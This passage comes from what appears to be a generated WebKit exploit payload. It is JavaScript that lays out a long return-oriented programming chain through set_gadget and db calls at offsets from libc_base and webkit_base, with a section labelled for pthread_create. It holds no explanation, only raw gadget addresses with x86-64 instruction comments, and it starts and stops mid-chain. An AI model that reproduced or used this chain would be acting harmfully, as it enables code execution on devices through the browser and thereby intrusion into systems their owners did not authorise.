ropchain+148592, //L2083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2083:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2082:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+148696, //L2085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+148680, //L2084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2084:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2085:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148800, //L2086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148816, //L2087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2086:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2087:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148936, //L2088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148920, //L2089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2089:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2088:
db([0, 0]); // 0x0
//_pthread_create__rop:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+149008, //L2091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2091:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149072, //L2093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2093:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149176, //L2094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149192, //L2095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2094:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2095:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2096:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2097:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+149320, //L2099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+149304, //L2098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2098:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2099:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2100:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2101:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L2102:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2103:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2105:
db([4096, 0]); // 0x1000
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+149632, //L2106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2106:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2108:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2110:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+149824, //L2111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2111:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+149936, //L2113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2113:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2114:
db([65536, 0]); // 0x10000
set_gadget(libc_base+144605,); //pop rdi
//L2115:
db([65536, 0]); // 0x10000
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+150064, //L2117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+150048, //L2116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2118:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2120:
ropchain+150216, //L2119
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+160336, //L2121
//L2119:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967248, 4294967295]); // -0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+150312, //L2123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2123:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+150368, //L2124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2124:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2126:
db([65536, 0]); // 0x10000
set_gadget(libc_base+763368,); //pop rcx
//L2127:
db([65536, 0]); // 0x10000
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+150520, //L2129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2129:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+150576, //L2130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2130:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+150648, //L2132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2132:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2134:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2135:
db([312, 0]); // 0x138
set_gadget(libc_base+764760,); //pop rsi
//L2137:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2139:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+150864, //L2142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+150848, //L2140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2140:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2142:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+151040, //L2145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+151056, //L2146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151008, //L2143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+151024, //L2144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2143:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2144:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2145:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2146:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+151152, //L2148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+151136, //L2147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2147:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2148:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2149:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L2150:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+151376, //L2152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+151392, //L2153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151360, //L2151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2151:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2152:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2153:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+151480, //L2154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+151496, //L2156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2154:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2156:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2157:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2159:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+151656, //L2162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151640, //L2160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2162:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+151832, //L2165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+151848, //L2166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+151800, //L2163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+151816, //L2164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2163:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2164:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2166:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+151944, //L2168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+151928, //L2167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2167:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2168:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2170:
db([15, 0]); // 0xf
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+152056, //L2171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2171:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+152208, //L2174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+152224, //L2175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152192, //L2173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2173:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2174:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2175:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+152312, //L2176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+152328, //L2178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2176:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2178:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2179:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2181:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+152488, //L2184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152472, //L2182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2182:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2184:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+152664, //L2187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+152680, //L2188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152632, //L2185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+152648, //L2186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2185:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2186:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2187:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2188:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+152776, //L2190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+152760, //L2189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2189:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2191:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L2192:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+153000, //L2194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+153016, //L2195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+152984, //L2193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2193:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2194:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2195:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+153104, //L2196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+153120, //L2198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2196:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2198:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2199:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2200:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2202:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+153296, //L2205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153280, //L2203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2203:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2205:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+153440, //L2208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153408, //L2206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+153424, //L2207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2206:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2207:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2208:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+153512, //L2210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2210:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+153568, //L2211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2211:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+153648, //L2213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2213:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2215:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+153768, //L2218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153752, //L2216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2216:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2218:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+153944, //L2221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+153960, //L2222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+153912, //L2219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+153928, //L2220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2219:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2220:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2221:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2222:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+154072, //L2223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+154104, //L2225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+154088, //L2224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2223:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2224:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2225:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+154192, //L2227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2227:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+154248, //L2228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2228:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+154320, //L2230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2230:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2232:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L2234:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+154480, //L2237
